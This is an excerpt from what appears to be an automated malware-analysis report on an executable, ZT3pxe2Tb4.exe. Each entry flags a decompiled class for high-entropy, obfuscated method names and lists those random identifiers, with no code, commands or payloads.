Source: ZT3pxe2Tb4.exe, IvcW8TkzBMKefsOxjFW.cs High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'dbRDWn7vBB', 'RMmDLp8AWE', 'gY2', 'rV4', '_28E'
Source: ZT3pxe2Tb4.exe, Qf4khHiUCwcf7y7oGvp.cs High entropy of concatenated method names: 'LfwiQi4w82', 'bGbuXRWOb87scqdRgwvW', 'M7xMn5WOZ2wIHmhNERHh', 'YLOQwNWOyoC5bgdi10cw', 'iC4GhFWOo5Imjmf1gAfQ', 'Hk5i5w6cjF', 's5OowCWOgq5ARJs5q9v7', 'omd0m7WOeTB3fX7rCK1i', 'VXhkunWOSxFlmfa9i8gD', 'g0LsGZWO1QLv9bnVly7F'
Source: ZT3pxe2Tb4.exe, kcK8LC2ejuNjeyVIyjO.cs High entropy of concatenated method names: 'LkP2O5YDJm', 'GcKaIOW78SAkkpo08bBu', 'giqHAbW76phoaTebjdZA', 'LnvbrgW7HeRFDDiyZw7X', 'yCX2ZKxSG2', 'Vb7IVgW7iQVXxvkFO8K0', 'bbBOEWW7WIej7vsmaBhY', 'qK50M9W7LRubbsxwEQFV', 'EFG3lhW7jaLD9sv6DOFR', 't7Dc5RW7qkn0bNRyGE5v'
Source: ZT3pxe2Tb4.exe, VtQKgNTAqnrKagf1yIu.cs High entropy of concatenated method names: 'n5Kk3EEQl0', 'kgGkWKIgIh', 'G92kLFjHgj', 'qXikiH2y2w', 'H8ikjCF6oJ', 'RUyIZSWrqEP0JkOP09DZ', 'SS9xK3WriE9ikSr3kUDa', 'bGLW0LWrjv6WVntvNZQD', 'UHEbxsWrMUclxO47159y', 'fD2XcRWr2bRXi2tnTcJi'
Source: ZT3pxe2Tb4.exe, GLngHO6KQsXpnYd4Osh.cs High entropy of concatenated method names: 'xrU6rIosOQ', 'c9x3RIWYNJPDR4tQx2DF', 'nJ1cCIWYH7nZfWJuWeth', 'yKJvH6WY8Scg3DGyi3Be', 't4G8rSWYxr6h1EFrkKC4', 'UU8', 'd65', 'gM7WjsqUjnK', 'XGTWjT6Jbxx', 'UP5WFbRhlso'
Source: ZT3pxe2Tb4.exe, aR00MCKbKrrQcafHklS.cs High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: ZT3pxe2Tb4.exe, aaCFBpjrGhL277svCex.cs High entropy of concatenated method names: 'tnUjvLxJLs', 'GmDwVRWKYR7RwiS5Aiax', 'krM5CkWK7qgJSs2aCjSk', 'TiR06qWKdcSHaP8aUAGm', 'LmWuQhWK09Gg38k3Vjio', 'uhQjmoprTc', 'XI0jnbV2Kn', 'EEujfUyT9R', 'e1ci4VWKKELbu3WC5yxd', 'HVsiKnWKhZMeSG9qP2bK'
Source: ZT3pxe2Tb4.exe, u5DC3ZK3VWcZhtg5bex.cs High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: ZT3pxe2Tb4.exe, c2O1aZjIohIVoPInDqr.cs High entropy of concatenated method names: 'XHnjJD3uvL', 'gatjAHEgEu', 'kskjzZqh3W', 'cnQYYmWKPa55kXHoYZTH', 'M68xQ6WKEGTxHHw4Y69S', 'QeOUiHWKnnFRpiLrA0m9', 'yf3MZ2WKfQ9uKh7ZBlDe', 'gFojRApOcJ', 'gdbjwM5gQg', 'UQBj4yjfBe'
Source: ZT3pxe2Tb4.exe, BDINTO6ucFPcvOZhsbK.cs High entropy of concatenated method names: '_816', 'd65', 'IH2Wj2eM4Nw', 'OnZWjFWj7mi', 'fxPWF9fBpBq', 'HyrWj32dYif', 'PgI93hWdUSiDA5m6F7aS', 'VfcacVWdvaRvTwGqV8bL', 'Ix0pM3WdPHroHWZOWtl9', 'hcbkOBWdEUuas0x9xtVc'
Source: ZT3pxe2Tb4.exe, u0BBE28OSXVKWSIQuO6.cs High entropy of concatenated method names: 'kwUxBxhXYD', 'CtropMWXEHZbgDXJ8KT6', 'pSgI55WXfnKRqgCaqruG', 'Ifhtj6WXP1fotuIWWkh0', 'AR0kXCWXU6ceFZSFyPwH', 'fks8aatNG6', 'wyp8lv1SWx', 'QEf871OxrT', 'mOP8d1TF6k', 'biu8Y5l9Fl'
Source: ZT3pxe2Tb4.exe, wwOJUoHXIrB4EWAbwDr.cs High entropy of concatenated method names: '_2SY', 'NnyWFYQN31f', 'O8sHrkWZQU', 'EWCWF02WLlY', 'Qtanr4W0ZCd7af5HwyPB', 'VGpVUrW0yHZEGk5PHpUm', 'D4Gx5ZW0eN0OhRCBCrtm', 'AUuMNwW09fyf0By2WA2O', 'igyx8MW0buNuPrflIHYa', 'tKLX1KW0orb9dZicUpiW'
Source: ZT3pxe2Tb4.exe, LepXF7saQNmyW35F7qZ.cs High entropy of concatenated method names: 'j9l', 'bsNs7fxqdV', 'UpnsdRg4Bu', 'UlUsY19HaI', 'TBRs0C9Owv', 'awbsXPD4HT', 'St1sV2cZRK', 'NebRnXWVZ7W9Up753iqP', 'sS0qGqWVe3KYt3qsHZ9j', 'rLw6GTWV9eobHbHQmJMo'
Source: ZT3pxe2Tb4.exe, jkQg7ipZplPn1UotyQn.cs High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: ZT3pxe2Tb4.exe, mFKgY6O0mUDEgBvPdTN.cs High entropy of concatenated method names: 'YNCOVaFr8s', 'nGLOrBgANR', 'WinOtQUr1p', 'Y2ZOm2E54n', 'dETOnfn2uA', 'LG6r8FWv9gjbhIMJuJyi', 'lN3sB6WvZLMV8BEeLVqj', 'yWZZhYWvghfdpNHRHRdQ', 'zMXvDwWveyguGAOBuaok', 'Ftj3vuWvyIjDpE4rHuYs'
Source: ZT3pxe2Tb4.exe, LDmdN86zB9ogB03sCmW.cs High entropy of concatenated method names: 'tbsHMNecSx', 'MHOq21WYt1QXMQpsvFE5', 'kAhKUUWYVgB4rIxXZ3K2', 'q2wkxJWYrQa11p7T7JDJ', 'VF6UfoWYmpQkr78GmYFE', 'gwX5g8WYn8kUhBDmxBJ4', 'eq7', 'd65', 'PTIWjSrQrDh', 'VhpWj1i8OCN'
Source: ZT3pxe2Tb4.exe, w1ZvxosTOM7oO8WXijS.cs High entropy of concatenated method names: 'GfHsDr0F6n', 'y6lspaa3wB', 't6Fsu2POKC', 'q4Y5sQWVBH6nSK9ZVqNr', 'LXPsu3WVp9cmFccG0h4K', 'iTFsPEWVuXH1Gcx3DuZ3', 'iElKCKWVGAwGbwRpCyVR', 'RmfIvPWVSL4rZo5t6tRM', 'sKFj2hWV1YrM9x8ATgW6'
Source: ZT3pxe2Tb4.exe, F8pEmTlg0rSROwdxrKr.cs High entropy of concatenated method names: 'krr7kqSRvb', 'zcvlkgW5cK0XQpODnT1c', 'Ee2jcUW54H7BoTqoRuUA', 'qDu0xwW5CfA1Li6f3hsk', 'fUUwiuW5JNdNKCW5OWC9', 'i5X', 'GNwl9M7iJb', 'W93', 'L67', '_2PR'
Source: ZT3pxe2Tb4.exe, ElFAbjRAp8gHomcv42l.cs High entropy of concatenated method names: 'RmTwL0WRGB', 'v87wipyKvK', 'JqKh6JWcKYR2EuEHZCsC', 'H4SYsLWchoFJfIpr3lR7', 'g71f0QWcOQ9SdAFuje4c', 'pFXbgtWca4jDDgEKy5YP', 'coORTFWclHUXXbeOGwGi', 'yR2AfaWc7TNEHIFPScxk', 'g4yw3X8UCJ', 'XRTj37WcZUDqyiwCEBJb'
Source: ZT3pxe2Tb4.exe, mo13yK5CrYctkp3dlB7.cs High entropy of concatenated method names: 'TEeINwo7Ns', 'IjmolGW428keDMoo5csY', 'CGvTVAW4F9jVpOYxs3EA', 'd6SeJnW46I9joy3qeXJp', 'GqcaJsW4H4BaBUjCfDpe', 'CPX', 'h7V', 'G6s', '_2r8', 'N28WM7hLb6L'
Source: ZT3pxe2Tb4.exe, hMjBriK40KebJGhAYmQ.cs High entropy of concatenated method names: '_2JN', 'A67', '_49I', 'uqIKcvlyIf', 'asDKJVICv8', 'mgnKAlECkA', 'FVcKzY5Jy1', 'Ouua3esIlb', 'SQdaWwkggl', 'xQRFD3W5GREXLSZOIZ6H'
Source: ZT3pxe2Tb4.exe, aTgUygLFeVy5edD89Ae.cs High entropy of concatenated method names: 'aI6LHxY4MS', 'QnAL8OS6CH', 'pgALNxmOY8', 'q5KaheWotxOjj9xjTqw1', 'TgBq2sWom3T8IULBGgkn', 'v14HX7WonspJilOXqCCB', 'inmaqXWoffLJcyiit785', 'yRtXGqWoPOPGZlkA8AFC', 'f2ohwRWoEjLy0fxB4SlE'
Source: ZT3pxe2Tb4.exe, ViYhcOdF6vrUa0t1cjY.cs High entropy of concatenated method names: 'GYYdHYshg4', '_64r', '_69F', '_478', 'Ffyd84HaLF', '_4D8', 'fDwdNIPwuk', 'MkqdxX6T6O', '_4qr', 'WJNdsyoQFL'
Source: ZT3pxe2Tb4.exe, uasKPgqg0wV17QK4luA.cs High entropy of concatenated method names: 'UBCqdMCWW2', 'M2aqYYZ6kF', 'J1mOQ7Wa1BE7ogk8RAN9', 'KaIno1WaGixdQbC7UNhw', 's9RaCnWaSIi3NZRaqRRN', 'al0uMfWagZbQZ4LeRBcL', 'v43q9V2cac', 'smDqZdRSl1', 'kEaqyFTRnV', 'RNYqbbY9nT'
Source: ZT3pxe2Tb4.exe, kybOR8oTmeBISGwfmSh.cs High entropy of concatenated method names: 'egOoDux0Or', 'SccopGwdZW', 'krgouJCNhT', 'Cm01THWEN9et5W0EMbWS', 'wC0hbqWEHVd3MG51ZTiI', 'x3qIQCWE88FIX3jwhgiC', 'UIgT3lWExribZNZL2cZu', 'wMYIxPWEsLCEVmLE46Vd', 'g4w5jAWET2JcAXx1daDJ', 'm9TtXSWEkIfF8AtiWxXH'
Source: ZT3pxe2Tb4.exe, SJGuNI0uH1RArSK0LD5.cs High entropy of concatenated method names: 'tvQ0Gu2HDM', 'DWi0SXRPmw', 'wyP012niCO', 'Uht0gn3di7', 'iF80eS3wEP', 'W2H09d5swb', 'u7e0ZRanfA', 'mPU0yXQ65L', 'JS80b30dq4', 'nHi0owuppM'
Source: ZT3pxe2Tb4.exe, v2CkUEWyx02og5QaT9I.cs High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'j9VWFkFfihW', 'cnqWi5B8Sbb', 'L2hfrCWb4fenqAadb8x1', 'UCnAJUWbC1Bo8UPyofw7', 'SQGhqNWbc7RbZEkl7vvp'
Source: ZT3pxe2Tb4.exe, uXVGqXqxAnF7qry6M3R.cs High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'kAiWFSLpZnF', 'TeAWizk87oU', 'MFNEwLWa3ntbDuaRcE2Y', 'gXwdRcWaWheoaVrsZe1g', 'lUHqwEWaL5E5sxGhdPjY', 'gdvgxAWaicZx33EmW40w', 'kNBPQsWajjvO0aLRGnL4'
Source: ZT3pxe2Tb4.exe, pm0mP5pLfQBPCqdik4R.cs High entropy of concatenated method names: 'FQ3pp5nQcg', 'JdapBfSQPW', 'FubpjGYFc2', 'wcipqD7Wya', 'qJxpMulk9A', 'VKdp2WRmuj', 'FYtpFWhwIR', 'urgp6UbXDt', 'ys8pHvSYli', 'bhXp8VvwM7'
Source: ZT3pxe2Tb4.exe, Ww4k6dwNg7TTBpNPODA.cs High entropy of concatenated method names: 'rn3wsZGFM0', 'N9mwT9pv3C', 'n3Xwk2IoRG', 'sfNwD0JPDQ', 'hs2wpduBr0', 'BkRwugdc0A', 'xiZXRLWcnTXtoruJprus', 'D8eQYDWcfLKvl03m7ANI', 'T329SBWcPOgVomlQwrmw', 'FoXjP5WcE9mbaCdGJpUE'
Source: ZT3pxe2Tb4.exe, sTBjDmDgGaOZJNJPS2b.cs High entropy of concatenated method names: 'edgDPTjmqj', 'MPVD9MgGfm', 'ncLDZFjyLG', 'oN7DyxnOWq', 'J7oDb4U7Sm', 'LW1DoYsLM9', 'fKODhZ4DYK', 'Ul2DO4Nq5r', 'wNtDKymRYi', 'HsPDaeJYaG'
Source: ZT3pxe2Tb4.exe, uQGZYWjdDiVt8p1pGAa.cs High entropy of concatenated method names: 'ERVj0SWeTX', 'X2qjXgg0QE', 'JvR5yJWKg1iARcH3A6Ok', 'OyVFe7WKSQZGAqEsjwBV', 'u4Cme1WK1OTKjoBu1wok', 'L0MwxTWKefNQ8cQTdOjU', 'wNADDjWK9WXmdwGPOIqD', 'HHkTJZWKZgxc037kfk8O', 'yYnMi3WKyYKXS0pTAegA', 'DPaMqUWKbMUChsJRBoR1'
Source: ZT3pxe2Tb4.exe, nVmYajLBrhsY5QJ9CXJ.cs High entropy of concatenated method names: 'LvGLSQQX6U', 'PaKL1toIbU', 'uI3KwWWoJfqEmLrqwnNu', 'QRBxs3WoCDysBq72VsCv', 'YGlJx7Wocj7QJPhkscSD', 'vGU7BoWoAZTwO1rPen71', 'vMC1fmWozA5i3uPAJHBu', 'GG1oj9Wh3KeAAwS7K1Qm', 'Sm0qSxWhWJggHTTVLHoF'
Source: ZT3pxe2Tb4.exe, fkdgKLhSo1ryjWHpoDM.cs High entropy of concatenated method names: 'wXphg9r4nS', 'yUQhel6MWT', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'nL7h9gV0SW', '_96S', '_9s5'
Source: ZT3pxe2Tb4.exe, K4L4Kuoi6p2AyuhfbCC.cs High entropy of concatenated method names: 'IWIoqF6bIA', 'G0GoMwB9FM', 'dpUo2GDsea', 'F3UoFLVeme', 'N14o6INJip', 'jAJGRjWPJC25ePw60pFF', 'nHvNjxWPCLp0jfSkeXpu', 'fSlpmNWPc9F03yBkXBNA', 'mMDalmWPAnZgwf7bfl73', 'yYBqwhWPziNyJgCZGJOM'
Source: ZT3pxe2Tb4.exe, c3y73XWUiip6Ld5dLTo.cs High entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'lkUWFuNFdy3', 'cnqWi5B8Sbb', 'M19VD1WoSDuJrpgrj8qP', 'pja14cWo1QES1tkPJU7l', 'uDt9xnWogRh1wEaAPU4v'
Source: ZT3pxe2Tb4.exe, MtpvWFxndmfaRZi5UFW.cs High entropy of concatenated method names: 'b7jxPEdlOl', 'QWPxExhebG', 'EeQxU586pA', 'YSZxvRENuU', 'W5Jx5YeqQm', 'UHYPo9WV3uT83YTQ9JAV', 'v6D7Y2WVWeAW47Ya9oLM', 'mHFnTeWVL773K60AOhR0', 'GZxHypWViOru2W9U05if', 'HcQXS7WVjtF69T8V3Hek'
Source: ZT3pxe2Tb4.exe, zuitJ08Miu7x1I3wlys.cs High entropy of concatenated method names: 'X1eAnbWXBxMBKwPjYEGy', 'VrmBZRWXpYmseugRB2wB', 'hQTrWRWXuI6GnFoqcbBB', '_7kT', '_376', 'e298FM2M51', 'eM986RRr48', '_4p5', 'oOe8HFvTFp', 'UFs88NnOw9'
Source: ZT3pxe2Tb4.exe, EUZnvjhVDkfEOpF8qtm.cs High entropy of concatenated method names: 'Bv3htjMnJu', 'KM3hm8NZQL', 'SkNhnte9pv', 'twIhfqM1bP', 'PK8hPsMiAN', 'aNNhECfeAe', '_4tg', 'wk8', '_59a', '_914'
Source: ZT3pxe2Tb4.exe, CudGtbJnUdMqyGkOyGM.cs High entropy of concatenated method names: 'fIaWMU1mAAW', 'BSNWMv8UYy3', 'JV4WM5mwkCu', 'D8bWMIoHwnx', 'sxYWMQbD7Ot', 'os0WMRw0g3P', 'TQ0WMwcSvjY', 'ExdA6bgZHi', 'mvMWM4k2kei', 'E7qWMCmTBqQ'
Source: ZT3pxe2Tb4.exe, aL44LIoQoNd9326E6sO.cs High entropy of concatenated method names: 'P2qowNiiSZ', 'Rlko4pRphs', 'vMIoCBKRXB', 'Xe9oc4EfrY', 'rASoJY2fkd', 'yl8oAiVTF3', 'cQdozCBLd9', 'ApPh39cIEt', 'BxMhW8dWmv', 'LWJhLASQo4'
Source: ZT3pxe2Tb4.exe, BQrhPBRjIY94a9BGjPW.cs High entropy of concatenated method names: 'HP3RMVm9lv', 'YgHR2fhOSt', 'iBnRFAMuLb', 'mQCR6uPpHT', 'oJLRH2wO9D', 'VF4R8GMCij', 'sjyRN9GTr1', 'YLSRx4SAli', 'UueRsUgfUY', 'kknRTPiHVa'
Source: ZT3pxe2Tb4.exe, UxmYitTB4aVlnUcMt7B.cs High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'tfyTSFUAGk', '_947', 'QCKT169MAK', 'ypVTga4gGX', '_1f8', '_71D'
Source: ZT3pxe2Tb4.exe, xGXCVXRnqsrcf8MjaPh.cs High entropy of concatenated method names: 'FO7RPWXO44', 'wXoRECg4CQ', 'iq1RUFSKyh', 'eArRviKlQa', 'G8BR5YQpHy', 'TWrRI71uvB', 'xoyRQVJ0Si', 'ki3RR3hIDT', 'IhL1A7WculSAWP8LKocM', 'mJkaSsWcDTkeYb1ioiOj'
Source: ZT3pxe2Tb4.exe, rqW7SwQjVj5lFN7Wtgl.cs High entropy of concatenated method names: 'dcyQMJkeaa', 'tOeQ2Q2uwf', 'tfwQFrnTLy', 'qTfQ640qDw', '_0023Nn', 'Dispose', 'neen1HW4Q7eYdTJHolUk', 'xWV58CW451iad724ZUk0', 'IYDraoW4IasLwLkLEJd3', 'k5X6LcW4RJQ4X8b9E41c'
Source: ZT3pxe2Tb4.exe, gpZraAqE8t6bNqW3rKd.cs High entropy of concatenated method names: 'P4RqciSxn6', 'l7FqJch5m4', 'olxH4hWa7mkiPXmG2Mu0', 'pR3KIyWaaQH9GXHf0CEE', 'sLZ6ulWalVIWCdwDY13q', 'R0fMWkF2v7', 'pUv33DWaXvxshWMWWEfg', 'OM5EMDWaVuo9ThEZe0od', 'djHGUUWaYUAqxBssoDSM', 'wNbYQVWa0w4bZfGaJ4N8'
Source: ZT3pxe2Tb4.exe, AWst4S0tAZLyykQy96r.cs High entropy of concatenated method names: 'RPq0n2PjrA', 'aQs0fwrOdy', 'PyK0PIBaMx', 'iQZ0EgYKas', 'kIV0U5qXhZ', 'HgR0vAZei3', 'Kvk052gSC8', 'fu30I6hfs8', 'YwX0QW3lRg', 'cQ10RGX0po'
Source: ZT3pxe2Tb4.exe, BUP4lgHfnBc46OMHy7l.cs High entropy of concatenated method names: '_34V', 'y7u', 'j1FWFXoeQm0', 'Mf4HEuBiOs', 'gt1', 'mlV8KAW07iHJ2oL9Rw42', 'cIWCdFW0aoINaN278L3a', 'TMEb5HW0l4SlX0bpidGv', 'OMTYv1W0dQ2XlXAVf5s2', 'hNp0pyW0Y64F6Q84Bwkw'
Source: ZT3pxe2Tb4.exe, N8RSOlLO9Gp83pgPicl.cs High entropy of concatenated method names: 'EkALr3hiE2', 'eqDBhjWhs9DdI53SPxdm', 'FodORAWhNPLCW5AYpLxS', 'E4RJyvWhxysJYp0N97uo', 'nJIQWSWhTrpIG2Ew7w0a', 'LS4NfbWhkHKgU3WXZNBE', 'TKiLa66oEO', 'xsqLlyPY8p', 'rWOL7C6dr0', 'Xo5LdZoG37'
Source: ZT3pxe2Tb4.exe, NXd2dm6nao4utQP3xcT.cs High entropy of concatenated method names: 'IDV', 'd65', 'y8xWFoSgNvU', 'HyrWj32dYif', 'QZ46PxKksQ', 'IMD5bRWYTFvlGpXSnOsx', 'zLsl3qWYkdBlcVpbsN8y', 'Kjl4aLWYDVR0bC9VwHUp', 'GQVrWJWYpMCkHsiPpbCB', 'nv45wtWYuyAlvUCi09hP'
Source: ZT3pxe2Tb4.exe, DBGeHyiDRG5ErPLiQ6i.cs High entropy of concatenated method names: 'EoaioEV72M', 'lNWihCo1Z6', 'JJaiOKomkx', 'mySDNIWOFXUhnjZWuUji', 'VJssn2WOMketcQMImPrg', 'hpWxK7WO2cxNhTtCfV4Y', 'hkoi9CZE33', 'kuXiZQKEj7', 'APhP4kWOj8S96SPPAf9t', 'y7PtKJWOLQWYq4PAtqhC'
Source: ZT3pxe2Tb4.exe, M6SPGhQxLc1aSIS1yXU.cs High entropy of concatenated method names: 'iOnWM0BC61s', 'plpWMXQYwLO', 'lPyWMVd2Aic', 'itEPLvWCyjBuu2MCGtLq', 'zTH20aWCbv2fd4jWnPAM', 'TyBwNeWCoxtMeV6Ry6yt', 'N71WFEG4ufV', 'plpWMXQYwLO', 'eoJ1gAWCaWdI7y3uxm5W', 'nZMD1DWCOB5iJkCNTTff'
Source: ZT3pxe2Tb4.exe, ryu8bxoG9xsMFGvwTbA.cs High entropy of concatenated method names: 'HVNo1y2WyW', 'rsKognoaEK', 'ov8oehuEMy', 'Se7o9AV7hn', 'pMhoZFc2Kd', 'r1eoyubN37', 'P2cPI0WEBOipBLFZQYRo', 'Qy8WQ7WEpOfASBkVVI4Q', 'DRiRAAWEuHVsTqUbtId2', 'ioHVOEWEGEX05cROaYlY'
Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.cs High entropy of concatenated method names: 'wYvC2oWJSQjM8vNAifol', 'SdyQ3DWJ1WqTCyxdwST5', 'GAtcco2xLB', 'iwb7QEWJZ9y47E5JDSdJ', 'Sdtwb0WJyqNiBg0vHhB8', 'S2pYfHWJbk4TmI3MwGrT', 'qrm6iwWJowNa6qDPrMVn', 'hi8CJyWJhltpoZrEOFu0', 'zmwpuEWJOPcQuiITomjM', 'a6fVVHWJKGUiogPjcy14'
Source: ZT3pxe2Tb4.exe, H95vgtMfmgjo8uRkCOU.cs High entropy of concatenated method names: 'rqR23wC7es', 'GU62WrjbJE', 'PWA2LyMsUn', 'ImJ55hWlnpe9OeCUZlCl', 'scBP3fWlfC7NLDCCPi9L', 'OSDL9EWlt2VAcTKbuyf4', 'qZwoD8Wlmywgq8FH81mR', 'gRuMEtPn3m', 'LO2MUgTJB5', 'M8cMvT801X'
Source: ZT3pxe2Tb4.exe, hkf8C7M207boKQQHk30.cs High entropy of concatenated method names: 'F9rMGCUPFm', 'T8MMSkHvSp', 'FWqjjpWl3Kdnm8xC13hB', 'TEDJbiWaAqLBX1ofYce8', 'BBVpAGWazHIKMqspRQ5t', 'O2gIv2WlWcwma4ZTm9qr', 'b2XMp3AsxN', 'uB0MuRFCHc', 'RtdQW0WaChlscADO9MVe', 'ji0nINWawERVw8t8cgHY'
Source: ZT3pxe2Tb4.exe, Cjj50nXGLj0ZTJOPI3k.cs High entropy of concatenated method names: 'xqk72kWRd7lpvVj2i4gd', 'g8YFkYWRYpxcC3lkAPyK', 'GmAbPLWRlWAn3WDEVsUe', 'lgKJVXWR7tpcDfp9HiHA', 'xrtnDuWROL1SeRo3DgXi', 'i9uMy5WRKNfhNUCSuebp', 'rEAAbvWRoRuYrnbbhjQE', 'iPOn9vWRhcYoSE9ZstI5'
Source: ZT3pxe2Tb4.exe, odu5MJzCeylv0KMbdI.cs High entropy of concatenated method names: 'TXmWWKUc0n', 'HjdWiojb1p', 'RAjWjQ6d1u', 'dydWqLosMI', 'Mg4WMv1Gjt', 'eChW2fd5WP', 'EQnW6fbSyQ', 'ObLsLoWboEG2PJZsAZQ6', 'hqvuGcWbhSY25VXY3sFl', 'caXqQLWbODBWG941kOvI'
Source: ZT3pxe2Tb4.exe, bBbFAXpRHjfbKj4fxXX.cs High entropy of concatenated method names: 'Qt7Rv2Wnr9IAj9i0cKws', 'yUvPCIWnt1ehFJoq4WDx', 'dXbFFjWnmr3t8cvrTBk7', 'EIGgZT8XV5', 'OrUwo3WnEmlnw3VR7Y5Z', 'FwNpI2WnflmgpVPN3Ayn', 'cTHJHDWnP4LvhmMJS2pO', 'hMIgHqWnUqrnaHnXV9qV', 'eCsHC8WnvS6NKDoIemUX', 'eeQgoeB8OC'
Source: ZT3pxe2Tb4.exe, OpKD0lidMg583mZg3xK.cs High entropy of concatenated method names: 'dUqi0YJoDy', 'HnpiXigub6', 'Gh2iVAmGd8', 'xIjirKi6Sf', 'duGitkPl9c', 'y7IimqIRpp', 'fb1inTdwuH', 'NsRifKqb1C', 'fPGiPqXkby', 'bVmiEaL05S'
Source: ZT3pxe2Tb4.exe, XEkmGGCp8qxEBME3Y23.cs High entropy of concatenated method names: 'YGWLqUeNIwY', 'Sx5OMjWJsrks2TqkiKRa', 'Did4nkWJTAUTHwCpEBPq', 'QmL8X3WJkt9bKx1PpLXR', 'dHtYd7WJDHySugbch8nw'
Source: ZT3pxe2Tb4.exe, dJShQx7UFqhUNotsxMD.cs High entropy of concatenated method names: '_25r', 'h65', 'SwC75nrve4', 'srn7IVMVqR', 'BBW7Qomx7j', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: ZT3pxe2Tb4.exe, kAsrVt28NY4q1okyEwG.cs High entropy of concatenated method names: 'BIr2xcNqFZ', 'dk82sIm0vW', 'jpG2TbnqSO', 'e4FEaGWlRSHBGri3hIv1', 'zhfxs2WlwgoRVj83AnVi', 'p0eHciWl4L0IhqtEJEys', 'Yv8hBIWlCXtvruduVsxU', 'xdJkVRWlcpwLLnAKFvdp'
Source: ZT3pxe2Tb4.exe, C1w6GQH6uuREBUG2hXr.cs High entropy of concatenated method names: 'J3ZHskveia', 'pBQjJFWYQPh1t9JgkYgA', 'WBk1saWY5WhkZ4FSZ6oU', 'B3mNHUWYIZCv7oRpASqq', 'I51kjUWYRupDdkECTZbm', 'CEI2s8WYwQgR9yiL3xrf', '_53Y', 'd65', 'I5aWjePS6oO', 'HltWj9uwY8t'
Source: ZT3pxe2Tb4.exe, T2T5iSIKET210oxdcXb.cs High entropy of concatenated method names: 'k9fI7EETs2', 'mUaIXrVYrE', 'KP8ItxKMhF', 'M3eImN3guN', 'WAAInL1qAQ', 'fCJIfFiAaq', 'g03IPdB6v5', 'vwJIEgqTcu', '_0023Nn', 'Dispose'
Source: ZT3pxe2Tb4.exe, R6vBZyKah4J5acQK53O.cs High entropy of concatenated method names: 'ctuK7c171V', 'vqcKdo0H8Z', 'zFrKYBWXK0', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'yeQK0jtSFx'
Source: ZT3pxe2Tb4.exe, An43bwHCmwL8IFbu9GJ.cs High entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'zxZHJ9e98l', 'FekWFtoTRR2', 'PZZHAgylGS', 'thxWFmfY0fs', 'uvkP6qW05LhwIa7chWKm', 'hmoUOUW0UCadcAZZYGW0', 'VBE0PZW0vqX3eM0CrIZ6'
Source: ZT3pxe2Tb4.exe, v8QDIMOi2wN3bwmtmQC.cs High entropy of concatenated method names: 'QxiOqqJqfM', 'kQTOMtJXvW', '_7Bm', 'GtNO2VYuuP', 'qhyOFIOw0C', 'hEJO62a5O8', 'jVGOH3SCPl', 'upMaEeWUVAcZpI7fuQjC', 'TZuPWEWU0Dnllct0adbC', 'PZ39WkWUXWl89KkoFbE6'
Source: ZT3pxe2Tb4.exe, xIqDoaaMLvj33sZyqpu.cs High entropy of concatenated method names: 'yBePW9W5XYZfgpUN59Q0', 'oxyK5hW5Y3CmiJNJhIrW', 'mgLPniW50b0dafQQ6lL0', 'nhdaFKcjqp', '_1R8', '_3eK', 'Kc2a6yELxd', 'jgnaHTkwRb', 'ItMa8MQI9M', 'tduaNrAr6x'
Source: ZT3pxe2Tb4.exe, q2rE5WIZ0VEXSXWmW5a.cs High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'lArIb693gl', 'zETGaFW49vxvbPE9JdSq', 'pIDnegW4ZLkdImMww6xn', 'taZb3GW4yY2n29sIJae5', 'dPfXJlW4blxD65yVTLIl', 'b9Ku0eW4oSParpFmtR3y', 'FQXIvnW4hVnRaS6xYDhn'
Source: ZT3pxe2Tb4.exe, sfYYHd5IKSRE4RMxBy5.cs High entropy of concatenated method names: 'C14WFPRAuQI', 'bg05RCylOu', 'UBF5wMH0Pf', 'Q3I54mBT2m', 'cZiDTqWwKD96H0gkCru9', 'PWXjVyWwa65XnaOAnQOw', 'MxP98XWwl6V88oeAT2UT', 'pBoGp9Ww7ykW5exjScRs', 'vM46H1WwdWdZ0oDUxhqZ', 'T0dVH5WwY8msljDW8Sga'
Source: ZT3pxe2Tb4.exe, JrurtS2lj31Cs6BodjK.cs High entropy of concatenated method names: 'hKE2EOXnKJ', 'RSo2Un4Sal', 'oKA2vHxfL8', 'tnVhedW7Zo5BwmvGlB9i', 'avS6A3W7e5tQS5YoTCe1', 'g6J7weW79cByhyjgAtxN', 'fni2dY11RH', 'lGO2YclNWZ', 'NNv20fkohU', 'xnX2XSZJ00'
Source: ZT3pxe2Tb4.exe, IKFMi52wZfruKtYB7OI.cs High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'tF5d9XW7ldicFEOFWUsw', 'G1atOjW77ZvODKACGfN7', 'n6eXljW7dOU7bqG3gBZN', 'jbD2CNqj0a'
Source: ZT3pxe2Tb4.exe, zRgPCq6woxI16aoWYBS.cs High entropy of concatenated method names: '_46E', 'd65', 'lXL6CE8ZCq', 'k1vWFOTw9qC', 'HyrWj32dYif', 'PhF6cMw4d3', 'E6ATqlWYbAKSNYqhYd3o', 'EgCAbDWYoQNVWF1VFLUe', 'PgWwWKWYZuk51jyofvEW', 'IQi8PWWYyNCKQ65Bjwy8'
Source: ZT3pxe2Tb4.exe, QcZOAO6vk8rAj7gtvNM.cs High entropy of concatenated method names: '_8X5', 'd65', 'WSXWjpM8MYd', 'rG7WjuoDpE8', 'hwHWFhIXyCn', 'HyrWj32dYif', 'sEEjUIWY1LK45Tyk1509', 'SxplQFWYGFePOONVuhoJ', 'sMSZrMWYSDKRfQkp4gwZ', 'JP1HyGWYg2Ylpi5jadoX'
